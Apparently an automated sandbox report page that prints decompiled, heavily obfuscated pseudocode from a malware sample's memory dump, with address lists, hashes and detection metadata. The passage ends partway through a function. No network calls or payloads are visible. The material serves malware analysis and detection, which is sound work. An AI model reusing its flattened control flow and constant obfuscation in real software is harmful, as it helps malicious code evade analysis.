                                                                                                                      0x0082a0d2
                                                                                                                      0x00829fea
                                                                                                                      0x0082a00a
                                                                                                                      0x0082a00f
                                                                                                                      0x0082a013
                                                                                                                      0x0082a025
                                                                                                                      0x0082a065
                                                                                                                      0x0082a076
                                                                                                                      0x0082a07d
                                                                                                                      0x0082a085
                                                                                                                      0x0082a087
                                                                                                                      0x0082a08b
                                                                                                                      0x0082a08f
                                                                                                                      0x0082a096
                                                                                                                      0x0082a097
                                                                                                                      0x0082a098
                                                                                                                      0x0082a0a6
                                                                                                                      0x0082a0a7
                                                                                                                      0x0082a0a8
                                                                                                                      0x0082a0af
                                                                                                                      0x0082a0b4
                                                                                                                      0x0082a0b7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: d182f768c3a8ea6f8e5d9de1ae26096572558a5a1966b6f6777450be1622a07a
                                                                                                                      • Instruction ID: 2f4cff0b992a3bd5c1297dbe8523956074db18d9eaaffe4a81f385c75a9aaf2d
                                                                                                                      • Opcode Fuzzy Hash: d182f768c3a8ea6f8e5d9de1ae26096572558a5a1966b6f6777450be1622a07a
                                                                                                                      • Instruction Fuzzy Hash: CB22FFB15093819FD368CF25C94AA8BFBE2FBC5708F10891DE2D986261D7B19949CF13
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0083086E Relevance: 9.0, Strings: 7, Instructions: 241COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0083086E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t243;
				void* _t248;
				void* _t253;
				void* _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t298;
				void* _t299;
				signed int* _t301;
				void* _t309;

				_t301 =  &_v104;
				_v4 = 0xac6d1;
				_v4 = _v4 | 0x81c51043;
				_v4 = _v4 ^ 0x81ca09c2;
				_v8 = 0xb8d74f;
				_v8 = _v8 | 0x3a2284f4;
				_v8 = _v8 ^ 0x3ab94f49;
				_v12 = 0x56dc2c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0005485d;
				_v20 = 0x903a48;
				_v20 = _v20 ^ 0xb2572448;
				_v20 = _v20 ^ 0xb2cdfeb2;
				_v24 = 0x1df316;
				_v24 = _v24 * 0x26;
				_t271 = __ecx;
				_v24 = _v24 ^ 0x04774828;
				_t298 = 0;
				_v96 = 0x29fbe6;
				_t299 = 0x412d246;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0x40e6;
				_v96 = _v96 + 0xf8d0;
				_v96 = _v96 ^ 0x3f79ed75;
				_v28 = 0x5f5eb9;
				_v28 = _v28 ^ 0x304beccc;
				_v28 = _v28 ^ 0x301ae6f7;
				_v16 = 0x707b25;
				_v16 = _v16 | 0xc66cf16b;
				_v16 = _v16 ^ 0xc674099c;
				_v68 = 0x422c76;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x51e03a27;
				_v68 = _v68 ^ 0x51e925f4;
				_v72 = 0x838679;
				_t273 = 0x50;
				_v72 = _v72 / _t273;
				_t274 = 0xb;
				_v72 = _v72 / _t274;
				_v72 = _v72 ^ 0x0007ebfd;
				_v92 = 0x3398da;
				_t275 = 0x26;
				_v92 = _v92 * 0x6d;
				_v92 = _v92 ^ 0x75ca49c7;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0x0c9e0967;
				_v48 = 0x734a11;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x00076871;
				_v52 = 0xdc5b30;
				_v52 = _v52 ^ 0x2a73247b;
				_v52 = _v52 ^ 0x2aa1f0d2;
				_v104 = 0x2f7cf6;
				_v104 = _v104 / _t275;
				_v104 = _v104 * 0x41;
				_v104 = _v104 | 0xaae37d31;
				_v104 = _v104 ^ 0xaaffffad;
				_v56 = 0xefab9e;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x0008ac09;
				_v80 = 0xd17701;
				_t276 = 0x57;
				_v80 = _v80 / _t276;
				_v80 = _v80 + 0xffff6938;
				_v80 = _v80 ^ 0x000bb913;
				_v44 = 0x9eed53;
				_t277 = 0x32;
				_v44 = _v44 * 0x74;
				_v44 = _v44 ^ 0x480bdaeb;
				_v100 = 0xb1cacc;
				_v100 = _v100 ^ 0xb6415150;
				_v100 = _v100 / _t277;
				_t278 = 0x13;
				_v100 = _v100 * 0x1c;
				_v100 = _v100 ^ 0x667becf7;
				_v84 = 0x7272f5;
				_v84 = _v84 | 0x49285dda;
				_v84 = _v84 / _t278;
				_v84 = _v84 ^ 0x03db0e7b;
				_v32 = 0x23e0bb;
				_v32 = _v32 ^ 0xc1a40ef0;
				_v32 = _v32 ^ 0xc18ab8c7;
				_v36 = 0x934e6;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000f952f;
				_v76 = 0x57f010;
				_t279 = 0x55;
				_v76 = _v76 / _t279;
				_v76 = _v76 | 0x3f39553c;
				_v76 = _v76 ^ 0x3f3ef260;
				_v40 = 0x93d6f8;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x000a0563;
				_v60 = 0x62e666;
				_v60 = _v60 ^ 0x6bd8a41b;
				_v60 = _v60 * 0x61;
				_v60 = _v60 ^ 0xd19d18b1;
				_v88 = 0xe2190a;
				_v88 = _v88 * 0x56;
				_v88 = _v88 << 0x10;
				_v88 = _v88 * 0x2c;
				_v88 = _v88 ^ 0x1bd8b0be;
				_v64 = 0x7df3ba;
				_v64 = _v64 >> 3;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x0fbc3045;
				goto L1;
				do {
					while(1) {
						L1:
						_t309 = _t299 - 0x5b9992e;
						if(_t309 > 0) {
							break;
						}
						if(_t309 == 0) {
							_t253 = E00821B4F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x4369ff;
							_t298 = _t298 + _t253;
							continue;
						} else {
							if(_t299 == 0x4369ff) {
								_t298 = _t298 + E0081AB82(_t271 + 0x1c, _v60, _v88, _v64);
							} else {
								if(_t299 == 0x240c704) {
									_t260 = E00821B4F();
									_t301 = _t301 - 0xc + 0xc;
									_t299 = 0x5b9992e;
									_t298 = _t298 + _t260;
									continue;
								} else {
									if(_t299 == 0x412d246) {
										_t299 = 0x80cf0f0;
										continue;
									} else {
										if(_t299 != 0x47dcd1e) {
											goto L17;
										} else {
											_t265 = E00821B4F();
											_t301 = _t301 - 0xc + 0xc;
											_t299 = 0x240c704;
											_t298 = _t298 + _t265;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t298;
					}
					if(_t299 == 0x80cf0f0) {
						_t243 = E0081AB82(_t271 + 8, _v4, _v8, _v12);
						_t301 =  &(_t301[2]);
						_t299 = 0xe2e5f52;
						_t298 = _t298 + _t243;
						goto L17;
					} else {
						if(_t299 == 0xa9f5c45) {
							_t248 = E00821B4F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x47dcd1e;
							_t298 = _t298 + _t248;
							goto L1;
						} else {
							if(_t299 != 0xe2e5f52) {
								goto L17;
							} else {
								_t270 = E00821B4F();
								_t301 = _t301 - 0xc + 0xc;
								_t299 = 0xa9f5c45;
								_t298 = _t298 + _t270;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t299 != 0xe1ba840);
				goto L20;
			}















































                                                                                                                      0x0083086e
                                                                                                                      0x00830871
                                                                                                                      0x0083087b
                                                                                                                      0x00830883
                                                                                                                      0x0083088b
                                                                                                                      0x00830893
                                                                                                                      0x0083089b
                                                                                                                      0x008308a3
                                                                                                                      0x008308ab
                                                                                                                      0x008308b0
                                                                                                                      0x008308b8
                                                                                                                      0x008308c0
                                                                                                                      0x008308c8
                                                                                                                      0x008308d0
                                                                                                                      0x008308e1
                                                                                                                      0x008308e5
                                                                                                                      0x008308e7
                                                                                                                      0x008308ef
                                                                                                                      0x008308f1
                                                                                                                      0x008308f9
                                                                                                                      0x008308fe
                                                                                                                      0x00830903
                                                                                                                      0x0083090b
                                                                                                                      0x00830913
                                                                                                                      0x0083091b
                                                                                                                      0x00830923
                                                                                                                      0x0083092b
                                                                                                                      0x00830933
                                                                                                                      0x0083093b
                                                                                                                      0x00830943
                                                                                                                      0x0083094b
                                                                                                                      0x00830953
                                                                                                                      0x00830958
                                                                                                                      0x00830960
                                                                                                                      0x00830968
                                                                                                                      0x00830976
                                                                                                                      0x0083097b
                                                                                                                      0x00830985
                                                                                                                      0x0083098a
                                                                                                                      0x00830990
                                                                                                                      0x00830998
                                                                                                                      0x008309a5
                                                                                                                      0x008309a6
                                                                                                                      0x008309aa
                                                                                                                      0x008309b2
                                                                                                                      0x008309b7
                                                                                                                      0x008309bf
                                                                                                                      0x008309c7
                                                                                                                      0x008309cc
                                                                                                                      0x008309d4
                                                                                                                      0x008309dc
                                                                                                                      0x008309e4
                                                                                                                      0x008309ec
                                                                                                                      0x008309fa
                                                                                                                      0x00830a03
                                                                                                                      0x00830a07
                                                                                                                      0x00830a0f
                                                                                                                      0x00830a17
                                                                                                                      0x00830a1f
                                                                                                                      0x00830a24
                                                                                                                      0x00830a2e
                                                                                                                      0x00830a3c
                                                                                                                      0x00830a41
                                                                                                                      0x00830a47
                                                                                                                      0x00830a54
                                                                                                                      0x00830a5c
                                                                                                                      0x00830a69
                                                                                                                      0x00830a6c
                                                                                                                      0x00830a70
                                                                                                                      0x00830a78
                                                                                                                      0x00830a80
                                                                                                                      0x00830a90
                                                                                                                      0x00830a99
                                                                                                                      0x00830a9c
                                                                                                                      0x00830aa0
                                                                                                                      0x00830aa8
                                                                                                                      0x00830ab0
                                                                                                                      0x00830ac0
                                                                                                                      0x00830ac4
                                                                                                                      0x00830acc
                                                                                                                      0x00830ad4
                                                                                                                      0x00830adc
                                                                                                                      0x00830ae4
                                                                                                                      0x00830aec
                                                                                                                      0x00830af1
                                                                                                                      0x00830af9
                                                                                                                      0x00830b05
                                                                                                                      0x00830b08
                                                                                                                      0x00830b0c
                                                                                                                      0x00830b14
                                                                                                                      0x00830b1c
                                                                                                                      0x00830b24
                                                                                                                      0x00830b29
                                                                                                                      0x00830b31
                                                                                                                      0x00830b39
                                                                                                                      0x00830b46
                                                                                                                      0x00830b4a
                                                                                                                      0x00830b52
                                                                                                                      0x00830b5f
                                                                                                                      0x00830b63
                                                                                                                      0x00830b6d
                                                                                                                      0x00830b71
                                                                                                                      0x00830b79
                                                                                                                      0x00830b81
                                                                                                                      0x00830b86
                                                                                                                      0x00830b8b
                                                                                                                      0x00830b8b
                                                                                                                      0x00830b93
                                                                                                                      0x00830b93
                                                                                                                      0x00830b93
                                                                                                                      0x00830b93
                                                                                                                      0x00830b95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00830b9b
                                                                                                                      0x00830c24
                                                                                                                      0x00830c29
                                                                                                                      0x00830c2c
                                                                                                                      0x00830c31
                                                                                                                      0x00000000
                                                                                                                      0x00830b9d
                                                                                                                      0x00830ba3
                                                                                                                      0x00830ce1
                                                                                                                      0x00830ba9
                                                                                                                      0x00830baf
                                                                                                                      0x00830c03
                                                                                                                      0x00830c08
                                                                                                                      0x00830c0b
                                                                                                                      0x00830c0d
                                                                                                                      0x00000000
                                                                                                                      0x00830bb1
                                                                                                                      0x00830bb7
                                                                                                                      0x00830be9
                                                                                                                      0x00000000
                                                                                                                      0x00830bb9
                                                                                                                      0x00830bbf
                                                                                                                      0x00000000
                                                                                                                      0x00830bc5
                                                                                                                      0x00830bd8
                                                                                                                      0x00830bdd
                                                                                                                      0x00830be0
                                                                                                                      0x00830be5
                                                                                                                      0x00000000
                                                                                                                      0x00830be5
                                                                                                                      0x00830bbf
                                                                                                                      0x00830bb7
                                                                                                                      0x00830baf
                                                                                                                      0x00830ba3
                                                                                                                      0x00830ce3
                                                                                                                      0x00830cec
                                                                                                                      0x00830cec
                                                                                                                      0x00830c3e
                                                                                                                      0x00830cad
                                                                                                                      0x00830cb2
                                                                                                                      0x00830cb5
                                                                                                                      0x00830cba
                                                                                                                      0x00000000
                                                                                                                      0x00830c40
                                                                                                                      0x00830c46
                                                                                                                      0x00830c8a
                                                                                                                      0x00830c8f
                                                                                                                      0x00830c92
                                                                                                                      0x00830c97
                                                                                                                      0x00000000
                                                                                                                      0x00830c48
                                                                                                                      0x00830c4e
                                                                                                                      0x00000000
                                                                                                                      0x00830c50
                                                                                                                      0x00830c63
                                                                                                                      0x00830c68
                                                                                                                      0x00830c6b
                                                                                                                      0x00830c70
                                                                                                                      0x00000000
                                                                                                                      0x00830c70
                                                                                                                      0x00830c4e
                                                                                                                      0x00830c46
                                                                                                                      0x00000000
                                                                                                                      0x00830cbc
                                                                                                                      0x00830cbc
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: 6aa1a2c11ff8c726279449f5a4014dabab85cd71ee756e44266e51ce23d744d7
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 3FB121729083818FC358DF69D48A40BFBE1FBD4758F109A2DF4959A220D3B4DA48CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0081F8B8 Relevance: 9.0, Strings: 7, Instructions: 214COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0081F8B8() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t191;
				signed int _t193;
				signed int _t194;
				void* _t198;
				void* _t219;
				intOrPtr _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				intOrPtr* _t232;
				signed int _t233;
				signed int* _t234;

				_t234 =  &_v88;
				_v12 = 0x2790ea;
				_v8 = 0xba5a5c;
				_t198 = 0x3d69ab1;
				_t224 = 0;
				_v4 = 0;
				_v60 = 0x2fd7ed;
				_v60 = _v60 | 0x771a9d11;
				_t225 = 0x45;
				_v60 = _v60 * 0x4e;
				_v60 = _v60 ^ 0x55773f16;
				_v40 = 0xe86db6;
				_v40 = _v40 | 0xabe4da9c;
				_v40 = _v40 ^ 0xabe3ff81;
				_v84 = 0x4e4c43;
				_v84 = _v84 + 0x2260;
				_v84 = _v84 / _t225;
				_t226 = 0x36;
				_v84 = _v84 / _t226;
				_v84 = _v84 ^ 0x000c99de;
				_v36 = 0x2c2e8d;
				_v36 = _v36 ^ 0x89bc573f;
				_v36 = _v36 ^ 0x899e3850;
				_v56 = 0xc456b8;
				_v56 = _v56 << 1;
				_t227 = 0x7a;
				_v56 = _v56 / _t227;
				_v56 = _v56 ^ 0x000dd00d;
				_v24 = 0x6eec6c;
				_v24 = _v24 * 0x67;
				_v24 = _v24 ^ 0x2ca24ccd;
				_v28 = 0xbd5c18;
				_v28 = _v28 + 0xd697;
				_v28 = _v28 ^ 0x00bf4353;
				_v32 = 0x8ab54f;
				_v32 = _v32 * 0x47;
				_v32 = _v32 ^ 0x267a3e13;
				_v88 = 0x583e0f;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0xffff5904;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xb14dc739;
				_v44 = 0x7902f;
				_v44 = _v44 + 0xffff35ef;
				_v44 = _v44 ^ 0x000a0038;
				_v64 = 0xab1413;
				_v64 = _v64 + 0xffff0fb9;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0xaa2b0b8a;
				_v76 = 0x32b087;
				_v76 = _v76 | 0x42a79f0a;
				_v76 = _v76 ^ 0x7a54616b;
				_v76 = _v76 + 0x85;
				_v76 = _v76 ^ 0x38e777a2;
				_v20 = 0xba9969;
				_v20 = _v20 | 0x60b184e2;
				_v20 = _v20 ^ 0x60bd1ab4;
				_v52 = 0x531ceb;
				_v52 = _v52 ^ 0x8fc4675a;
				_v52 = _v52 >> 2;
				_v52 = _v52 ^ 0x23e32c7b;
				_v80 = 0xb054c0;
				_t228 = 0x5b;
				_v80 = _v80 / _t228;
				_v80 = _v80 << 1;
				_v80 = _v80 + 0xffffcecb;
				_v80 = _v80 ^ 0x0007d204;
				_v16 = 0x58f1c6;
				_v16 = _v16 ^ 0x8ee10e17;
				_v16 = _v16 ^ 0x8ebef1bd;
				_v68 = 0x312414;
				_t229 = 0x7b;
				_t233 = _v16;
				_v68 = _v68 / _t229;
				_v68 = _v68 + 0x1b34;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x00095176;
				_t197 = _v16;
				_t230 = _v16;
				_v72 = 0xc0cd63;
				_v72 = _v72 | 0x9a162f11;
				_v72 = _v72 << 3;
				_v72 = _v72 * 0x12;
				_v72 = _v72 ^ 0x18eea785;
				_v48 = 0xaed007;
				_v48 = _v48 ^ 0x406d7cc3;
				_v48 = _v48 << 3;
				_v48 = _v48 ^ 0x061a7dff;
				while(1) {
					L1:
					_t219 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t198 != 0x2c774a6) {
								if(_t198 == 0x3d69ab1) {
									_t198 = 0x526c216;
									continue;
								} else {
									if(_t198 == 0x4efcef6) {
										E0082DA89(_v76, _v20, _v52, _t233, _v80);
										_t234 =  &(_t234[3]);
										_t198 = 0x2c774a6;
										goto L1;
									} else {
										if(_t198 == 0x526c216) {
											_t232 =  *0x1002520c + 0x220;
											while( *_t232 != _t219) {
												_t232 = _t232 + 2;
											}
											_t230 = _t232 + 2;
											_t198 = 0xb318200;
											goto L2;
										} else {
											if(_t198 == 0x54b01d8) {
												_t193 = E00812296(_v56, _v24, _v28, _v60, _v32, _t230, _t197);
												_t234 =  &(_t234[5]);
												_t233 = _t193;
												_t191 = 0xe4f0407;
												_t198 =  !=  ? 0xe4f0407 : 0x2c774a6;
												_t219 = 0x5c;
												continue;
											} else {
												if(_t198 == 0xb318200) {
													_t194 = E0081DF36(_v84, _v36, _t198, _v40);
													_t197 = _t194;
													_t234 =  &(_t234[3]);
													if(_t194 != 0) {
														_t198 = 0x54b01d8;
														while(1) {
															L1:
															_t219 = 0x5c;
															goto L2;
														}
													}
												} else {
													if(_t198 != _t191) {
														goto L21;
													} else {
														E0081BA7D(_t233, _v88, _v44, _v64);
														_t224 =  !=  ? 1 : _t224;
														_t198 = 0x4efcef6;
														while(1) {
															L1:
															_t219 = 0x5c;
															L2:
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E0082DA89(_v16, _v68, _v72, _t197, _v48);
							_t234 =  &(_t234[3]);
							_t198 = 0xc9e12b8;
							_t191 = 0xe4f0407;
							_t219 = 0x5c;
							L21:
						} while (_t198 != 0xc9e12b8);
						L22:
						return _t224;
					}
				}
			}








































                                                                                                                      0x0081f8b8
                                                                                                                      0x0081f8bb
                                                                                                                      0x0081f8c5
                                                                                                                      0x0081f8cd
                                                                                                                      0x0081f8d6
                                                                                                                      0x0081f8d8
                                                                                                                      0x0081f8dc
                                                                                                                      0x0081f8e4
                                                                                                                      0x0081f8f3
                                                                                                                      0x0081f8f6
                                                                                                                      0x0081f8fa
                                                                                                                      0x0081f902
                                                                                                                      0x0081f90a
                                                                                                                      0x0081f912
                                                                                                                      0x0081f91a
                                                                                                                      0x0081f922
                                                                                                                      0x0081f932
                                                                                                                      0x0081f93a
                                                                                                                      0x0081f93f
                                                                                                                      0x0081f945
                                                                                                                      0x0081f94d
                                                                                                                      0x0081f955
                                                                                                                      0x0081f95d
                                                                                                                      0x0081f965
                                                                                                                      0x0081f96d
                                                                                                                      0x0081f975
                                                                                                                      0x0081f978
                                                                                                                      0x0081f97c
                                                                                                                      0x0081f984
                                                                                                                      0x0081f991
                                                                                                                      0x0081f995
                                                                                                                      0x0081f99d
                                                                                                                      0x0081f9a5
                                                                                                                      0x0081f9ad
                                                                                                                      0x0081f9b5
                                                                                                                      0x0081f9c2
                                                                                                                      0x0081f9c6
                                                                                                                      0x0081f9ce
                                                                                                                      0x0081f9d6
                                                                                                                      0x0081f9db
                                                                                                                      0x0081f9e3
                                                                                                                      0x0081f9e8
                                                                                                                      0x0081f9f0
                                                                                                                      0x0081f9f8
                                                                                                                      0x0081fa00
                                                                                                                      0x0081fa08
                                                                                                                      0x0081fa10
                                                                                                                      0x0081fa18
                                                                                                                      0x0081fa1d
                                                                                                                      0x0081fa25
                                                                                                                      0x0081fa2d
                                                                                                                      0x0081fa35
                                                                                                                      0x0081fa3d
                                                                                                                      0x0081fa45
                                                                                                                      0x0081fa4d
                                                                                                                      0x0081fa55
                                                                                                                      0x0081fa5d
                                                                                                                      0x0081fa65
                                                                                                                      0x0081fa6d
                                                                                                                      0x0081fa75
                                                                                                                      0x0081fa7a
                                                                                                                      0x0081fa82
                                                                                                                      0x0081fa92
                                                                                                                      0x0081fa97
                                                                                                                      0x0081fa9d
                                                                                                                      0x0081faa1
                                                                                                                      0x0081faa9
                                                                                                                      0x0081fab1
                                                                                                                      0x0081fab9
                                                                                                                      0x0081fac1
                                                                                                                      0x0081fac9
                                                                                                                      0x0081fad5
                                                                                                                      0x0081fad8
                                                                                                                      0x0081fadc
                                                                                                                      0x0081fae0
                                                                                                                      0x0081fae8
                                                                                                                      0x0081faed
                                                                                                                      0x0081faf5
                                                                                                                      0x0081faf9
                                                                                                                      0x0081fafd
                                                                                                                      0x0081fb05
                                                                                                                      0x0081fb0d
                                                                                                                      0x0081fb17
                                                                                                                      0x0081fb1b
                                                                                                                      0x0081fb23
                                                                                                                      0x0081fb2b
                                                                                                                      0x0081fb33
                                                                                                                      0x0081fb38
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb42
                                                                                                                      0x0081fb43
                                                                                                                      0x0081fb43
                                                                                                                      0x0081fb48
                                                                                                                      0x00000000
                                                                                                                      0x0081fb48
                                                                                                                      0x0081fb5a
                                                                                                                      0x0081fc5a
                                                                                                                      0x00000000
                                                                                                                      0x0081fb60
                                                                                                                      0x0081fb66
                                                                                                                      0x0081fc48
                                                                                                                      0x0081fc4d
                                                                                                                      0x0081fc50
                                                                                                                      0x00000000
                                                                                                                      0x0081fb6c
                                                                                                                      0x0081fb72
                                                                                                                      0x0081fc1a
                                                                                                                      0x0081fc25
                                                                                                                      0x0081fc22
                                                                                                                      0x0081fc22
                                                                                                                      0x0081fc2a
                                                                                                                      0x0081fc2d
                                                                                                                      0x00000000
                                                                                                                      0x0081fb78
                                                                                                                      0x0081fb7e
                                                                                                                      0x0081fbf3
                                                                                                                      0x0081fbf8
                                                                                                                      0x0081fbfb
                                                                                                                      0x0081fc04
                                                                                                                      0x0081fc09
                                                                                                                      0x0081fc0e
                                                                                                                      0x00000000
                                                                                                                      0x0081fb80
                                                                                                                      0x0081fb86
                                                                                                                      0x0081fbc1
                                                                                                                      0x0081fbc6
                                                                                                                      0x0081fbc8
                                                                                                                      0x0081fbcd
                                                                                                                      0x0081fbd3
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb42
                                                                                                                      0x00000000
                                                                                                                      0x0081fb42
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb88
                                                                                                                      0x0081fb8a
                                                                                                                      0x00000000
                                                                                                                      0x0081fb90
                                                                                                                      0x0081fb9e
                                                                                                                      0x0081fbaa
                                                                                                                      0x0081fbad
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb42
                                                                                                                      0x0081fb43
                                                                                                                      0x00000000
                                                                                                                      0x0081fb43
                                                                                                                      0x0081fb40
                                                                                                                      0x0081fb8a
                                                                                                                      0x0081fb86
                                                                                                                      0x0081fb7e
                                                                                                                      0x0081fb72
                                                                                                                      0x0081fb66
                                                                                                                      0x00000000
                                                                                                                      0x0081fb5a
                                                                                                                      0x0081fc75
                                                                                                                      0x0081fc7a
                                                                                                                      0x0081fc7d
                                                                                                                      0x0081fc82
                                                                                                                      0x0081fc89
                                                                                                                      0x0081fc8a
                                                                                                                      0x0081fc8a
                                                                                                                      0x0081fc96
                                                                                                                      0x0081fc9f
                                                                                                                      0x0081fc9f
                                                                                                                      0x0081fb43

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$CLN$`"$kaTz$ln$vQ${,#
                                                                                                                      • API String ID: 0-3310206870
                                                                                                                      • Opcode ID: 8248eef8b54e5ecb354579a418a4a3fa70159f394bf7605922f3802dd578227e
                                                                                                                      • Instruction ID: d51f7af0d4dd80c156e1525b80a51b272a79ffda4955bc845039b67c81846b6b
                                                                                                                      • Opcode Fuzzy Hash: 8248eef8b54e5ecb354579a418a4a3fa70159f394bf7605922f3802dd578227e
                                                                                                                      • Instruction Fuzzy Hash: 8EA153715083419FC358CF69C88585BFBE5FFC4398F10492DF69696261D3B18989CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00828586 Relevance: 7.8, Strings: 6, Instructions: 330COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00828586(void* __ecx, void* __edx, intOrPtr _a8) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				void* _t336;
				void* _t361;
				void* _t371;
				void* _t386;
				void* _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t439;

				_push(_a8);
				_t425 = 0;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E0081C325(_t336);
				_v1592 = 0xe90366;
				_t439 =  &(( &_v1704)[4]);
				_v1592 = _v1592 | 0xd8b262de;
				_v1592 = _v1592 ^ 0xd8fb63d7;
				_t386 = 0x283f0d8;
				_v1624 = 0xa39629;
				_v1624 = _v1624 >> 4;
				_t426 = 0x2c;
				_v1624 = _v1624 / _t426;
				_v1624 = _v1624 ^ 0x000bae79;
				_v1600 = 0xef5a7d;
				_t19 =  &_v1600; // 0xef5a7d
				_t427 = 0x1f;
				_v1600 =  *_t19 / _t427;
				_v1600 = _v1600 ^ 0x000c380d;
				_v1568 = 0xec630a;
				_t28 =  &_v1568; // 0xec630a
				_t428 = 0x1c;
				_v1568 =  *_t28 / _t428;
				_v1568 = _v1568 ^ 0x0002d50e;
				_v1668 = 0x697ac4;
				_v1668 = _v1668 ^ 0x43408629;
				_v1668 = _v1668 << 4;
				_v1668 = _v1668 << 0xf;
				_v1668 = _v1668 ^ 0xe763f227;
				_v1692 = 0xf5db19;
				_v1692 = _v1692 ^ 0xaa29ad2f;
				_v1692 = _v1692 >> 0xe;
				_v1692 = _v1692 << 6;
				_v1692 = _v1692 ^ 0x00a75d57;
